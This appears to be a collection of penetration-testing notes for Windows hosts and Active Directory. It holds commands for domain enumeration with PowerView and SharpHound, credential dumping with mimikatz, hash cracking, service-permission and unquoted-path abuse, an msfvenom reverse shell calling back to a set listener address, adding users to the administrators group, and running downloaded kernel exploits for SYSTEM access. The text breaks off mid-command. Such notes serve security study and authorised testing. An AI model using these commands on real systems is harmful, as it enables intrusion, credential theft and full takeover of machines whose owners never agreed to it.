Invoke-ShareFinder 49 | Get-NetComputers 50 | Get-NetComputer -fulldata | select operatingsystem 51 | https://gist.github.com/HarmJ0y/184f9822b195c52dd50c379ed3117993 52 | 53 | . .\Downloads\SharpHound.ps1 54 | Invoke-Bloodhound -CollectionMethod All -Domain DOMAIN -ZipFileName loot.zip 55 | 56 | mimikatz.exe 57 | > privilege::debug 58 | > lsadump::lsa /patch 59 | john crack.me --wordlist=~/wordlists/rockyou.txt --format=NT 60 | 61 | use exploit/windows/local/persistence 62 | set session 1 63 | 64 | # INSECURE SERVICE PERMISSIONS 65 | C:\PrivEsc\accesschk.exe /accepteula -uwcqv USER SERVICE 66 | sc qc SERVICE 67 | sc config SERVICE binpath="PATH" 68 | net start daclsvc 69 | 70 | # UNQUOTED SERVICE PATH 71 | sc qc SERVICE 72 | accesschk.exe /accepteula -uwdq "PATH" 73 | copy SHELL "PATH" 74 | net start SERVICE -------------------------------------------------------------------------------- /Pentesting Windows Hosts/Windows Privilege Escalation.md: -------------------------------------------------------------------------------- 1 | # Spawning Administrator Shells 2 | 3 | ## msfvenom 4 | 5 | If we can execute commands with admin privileges, a reverse shell generated by msfvenom works nicely: 6 | 7 | ``` 8 | msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.1.11 LPORT=53 -f exe -o reverse.exe 9 | ``` 10 | This reverse shell can be caught using netcat or Metasploit’s own multi/handler. 11 | 12 | ## RDP 13 | 14 | Alternatively, if RDP is available (or we can enable it), we can add our low privileged user to the administrators group and then spawn an administrator command prompt via the GUI. 15 | 16 | ``` 17 | net localgroup administrators /add 18 | ``` 19 | 20 | ## Admin -> SYSTEM 21 | To escalate from an admin user to full SYSTEM privileges, you can use the PsExec tool from Windows Sysinternals [PsExec](https://docs.microsoft.com/enus/sysinternals/downloads/psexec). 22 | 23 | ``` 24 | .\PsExec64.exe -accepteula -i -s C:\PrivEsc\reverse.exe 25 | ``` 26 | 27 | # Manual enumeration 28 | 29 | ## System enumeration 30 | 31 | ``` 32 | systeminfo | findstr /B /C:"OS Name" /C:"OS Version" /C:"System Type" 33 | hostname 34 | wimc qfe 35 | wimc logicaldisk get caption,description,providername 36 | ``` 37 | 38 | ## User enumeration 39 | 40 | ``` 41 | whoami 42 | whoami /priv 43 | whoami /groups 44 | net user 45 | net user 46 | net localgroup 47 | net localgroup 48 | ``` 49 | 50 | ## Network enumeration 51 | 52 | ``` 53 | ipconfig 54 | ipconfig /all 55 | arp -a 56 | route print 57 | netstat -ano 58 | ``` 59 | 60 | ## Firewall and AV enumeration 61 | 62 | ``` 63 | sc query windefend 64 | sc queryex type= service 65 | netsh advfirewall firewall dump 66 | netsh firewall show state 67 | netsh firewall show config 68 | ``` 69 | 70 | # Privilege Escalation Tools 71 | 72 | ## winPEAS 73 | 74 | https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS 75 | 76 | Compiled releases can be found here 77 | 78 | https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS/winPEASexe/winPEAS/bin/Obfuscated%20Releases 79 | 80 | Before running, we need to add a registry key and then reopen the command prompt: 81 | 82 | ``` 83 | reg add HKCU\Console /v VirtualTerminalLevel /t REG_DWORD /d 1 84 | ``` 85 | 86 | Run all checks while avoiding time-consuming searches: 87 | 88 | ``` 89 | .\winPEASany.exe quiet cmd fast 90 | ``` 91 | 92 | Run specific check categories: 93 | 94 | ``` 95 | .\winPEASany.exe quiet cmd systeminfo 96 | ``` 97 | 98 | 99 | ## PowerUp & SharpUp 100 | 101 | PowerUp & SharpUp are very similar tools that hunt for specific privilege escalation misconfigurations. 102 | 103 | PowerUp: https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerUp/PowerUp.ps1 104 | 105 | SharpUp: https://github.com/GhostPack/SharpUp 106 | 107 | Pre-Compiled SharpUp: https://github.com/r3motecontrol/GhostpackCompiledBinaries/blob/master/SharpUp.exe 108 | 109 | PowerUp 110 | To run PowerUp, start a PowerShell session and use dot 111 | sourcing to load the script: 112 | 113 | ``` 114 | . .\PowerUp.ps1 115 | ``` 116 | 117 | Run the Invoke-AllChecks function to start checking for common privilege escalation misconfigurations. 118 | 119 | ``` 120 | Invoke-AllChecks 121 | ``` 122 | 123 | To run SharpUp, start a command prompt and run the executable: 124 | 125 | ``` 126 | .\SharpUp.exe 127 | ``` 128 | 129 | SharpUp should immediately start checking for the same misconfigurations as PowerUp. 130 | 131 | ## Seatbelt 132 | 133 | Seatbelt is an enumeration tool. It contains a number of enumeration checks. 134 | 135 | It does not actively hunt for privilege escalation misconfigurations, but provides related information for further investigation. 136 | 137 | Code: https://github.com/GhostPack/Seatbelt 138 | 139 | Pre-Compiled: https://github.com/r3motecontrol/GhostpackCompiledBinaries/blob/master/Seatbelt.exe 140 | 141 | To run all checks and filter out unimportant results: 142 | 143 | ``` 144 | .\Seatbelt.exe all 145 | ``` 146 | 147 | To run specific check(s): 148 | 149 | ``` 150 | .\Seatbelt.exe … 151 | ``` 152 | 153 | ## accesschk.exe 154 | 155 | AccessChk is an old but still trustworthy tool for checking user access control rights. 156 | 157 | You can use it to check whether a user or group has access to files, directories, services, and registry keys. 158 | 159 | The downside is more recent versions of the program spawn a GUI “accept EULA” popup window. When using the command line, we have to use an older version which still has an /accepteula command line option. 160 | 161 | # Kernel Exploits 162 | 163 | Finding and using kernel exploits is usually a simple process: 164 | 165 | 1. Enumerate Windows version / patch level (systeminfo). 166 | 2. Find matching exploits (Google, ExploitDB, GitHub). 167 | 3. Compile and run. 168 | 169 | Beware though, as Kernel exploits can often be unstable and may be one-shot or cause a system crash. 170 | 171 | ## Tools 172 | 173 | Windows Exploit Suggester: https://github.com/bitsadmin/wesng 174 | 175 | Precompiled Kernel Exploits: https://github.com/SecWiki/windows-kernel-exploits 176 | 177 | Watson: https://github.com/rasta-mouse/Watson 178 | 179 | ## Exploitation 180 | 181 | 1. Extract the output of the systeminfo command: 182 | ``` 183 | systeminfo > systeminfo.txt 184 | ``` 185 | 2. Run wesng to find potential exploits: 186 | ``` 187 | python wes.py systeminfo.txt -i 'Elevation of Privilege' --exploits-only | less 188 | ``` 189 | 3. Cross-reference results with compiled exploits: https://github.com/SecWiki/windows-kernel-exploits 190 | 4. Download the compiled exploit. 191 | 5. Start a listener on Kali and run the exploit, providing it with the reverse shell executable, which should run with SYSTEM privileges: 192 | ``` 193 | .\x64.exe C:\PrivEsc\reverse.exe 194 | ``` 195 | 196 | # Service Exploits 197 | 198 | ## Service Commands 199 | 200 | Query the configuration of a service: 201 | ``` 202 | sc.exe qc 203 | ``` 204 | Query the current status of a service: 205 | ``` 206 | sc.exe query 207 | ``` 208 | Modify a configuration option of a service: 209 | ``` 210 | sc.exe config